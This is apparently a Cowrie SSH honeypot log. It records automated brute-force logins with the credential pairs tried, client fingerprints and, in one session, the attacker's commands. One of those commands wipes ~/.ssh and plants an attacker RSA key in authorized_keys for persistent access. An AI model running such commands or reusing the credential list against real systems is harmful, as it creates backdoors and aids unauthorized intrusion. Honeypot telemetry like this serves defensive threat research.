{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:55:15.590338Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41112,"dst_ip":"1.2.3.4","dst_port":22,"session":"acab6bf54889","protocol":"ssh","message":"New connection: 212.227.235.229:41112 (1.2.3.4:22) [session: acab6bf54889]","sensor":"my-vps","timestamp":"2025-09-09T07:55:15.671606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:55:15.672343Z","src_ip":"212.227.235.229","session":"acab6bf54889"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:55:15.756149Z","src_ip":"212.227.235.229","session":"acab6bf54889"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:55:16.135295Z","src_ip":"212.227.235.229","session":"acab6bf54889"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:55:17.221862Z","src_ip":"212.227.235.229","session":"acab6bf54889"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41122,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6910a0b2846","protocol":"ssh","message":"New connection: 212.227.235.229:41122 (1.2.3.4:22) [session: c6910a0b2846]","sensor":"my-vps","timestamp":"2025-09-09T07:55:17.306406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:55:17.307299Z","src_ip":"212.227.235.229","session":"c6910a0b2846"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:55:17.391931Z","src_ip":"212.227.235.229","session":"c6910a0b2846"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:55:17.785331Z","src_ip":"212.227.235.229","session":"c6910a0b2846"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:55:17.872140Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:55:17.873014Z","src_ip":"212.227.235.229","session":"c6910a0b2846"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37756,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e5595fc5f53","protocol":"ssh","message":"New connection: 212.227.125.160:37756 (1.2.3.4:22) [session: 7e5595fc5f53]","sensor":"my-vps","timestamp":"2025-09-09T07:55:26.692679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:55:26.700195Z","src_ip":"212.227.125.160","session":"7e5595fc5f53"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:55:26.999429Z","src_ip":"212.227.125.160","session":"7e5595fc5f53"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-09-09T07:55:30.537462Z","src_ip":"212.227.125.160","session":"7e5595fc5f53"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:55:31.845821Z","src_ip":"212.227.125.160","session":"7e5595fc5f53"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":50190,"dst_ip":"1.2.3.4","dst_port":22,"session":"d578de415e96","protocol":"ssh","message":"New connection: 92.118.39.62:50190 (1.2.3.4:22) [session: d578de415e96]","sensor":"my-vps","timestamp":"2025-09-09T07:55:47.843770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:55:47.844924Z","src_ip":"92.118.39.62","session":"d578de415e96"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:55:47.875249Z","src_ip":"92.118.39.62","session":"d578de415e96"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T07:55:47.967524Z","src_ip":"92.118.39.62","session":"d578de415e96"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:55:49.000475Z","src_ip":"92.118.39.62","session":"d578de415e96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34348,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5ae0dfbaf64","protocol":"ssh","message":"New connection: 212.227.235.229:34348 (1.2.3.4:22) [session: d5ae0dfbaf64]","sensor":"my-vps","timestamp":"2025-09-09T07:56:23.905806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:56:23.907859Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:56:23.992521Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.login.success","username":"root","password":"Hamster","message":"login attempt [root/Hamster] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:56:24.373625Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:56:24.600957Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:56:24.601621Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:56:24.602680Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:56:24.691104Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:56:24.877608Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:56:24.878281Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:56:24.965238Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:56:24.966475Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34360,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e4c9974bda0","protocol":"ssh","message":"New connection: 212.227.235.229:34360 (1.2.3.4:22) [session: 0e4c9974bda0]","sensor":"my-vps","timestamp":"2025-09-09T07:56:25.049220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:56:25.050440Z","src_ip":"212.227.235.229","session":"0e4c9974bda0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:56:25.135120Z","src_ip":"212.227.235.229","session":"0e4c9974bda0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:56:25.517379Z","src_ip":"212.227.235.229","session":"0e4c9974bda0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:56:26.604441Z","src_ip":"212.227.235.229","session":"0e4c9974bda0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34370,"dst_ip":"1.2.3.4","dst_port":22,"session":"543361588a4a","protocol":"ssh","message":"New connection: 212.227.235.229:34370 (1.2.3.4:22) [session: 543361588a4a]","sensor":"my-vps","timestamp":"2025-09-09T07:56:26.689311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:56:26.690140Z","src_ip":"212.227.235.229","session":"543361588a4a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:56:26.784974Z","src_ip":"212.227.235.229","session":"543361588a4a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:56:27.169367Z","src_ip":"212.227.235.229","session":"543361588a4a"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:56:27.255746Z","src_ip":"212.227.235.229","session":"d5ae0dfbaf64"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:56:27.256844Z","src_ip":"212.227.235.229","session":"543361588a4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59346,"dst_ip":"1.2.3.4","dst_port":22,"session":"38e14fbefa7c","protocol":"ssh","message":"New connection: 212.227.235.229:59346 (1.2.3.4:22) [session: 38e14fbefa7c]","sensor":"my-vps","timestamp":"2025-09-09T07:57:37.514899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:57:37.515951Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:57:37.600391Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer741","message":"login attempt [root/Qwer741] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:57:37.987595Z","src_ip":"212.227.235.229","session":"38e14fbefa7c"}
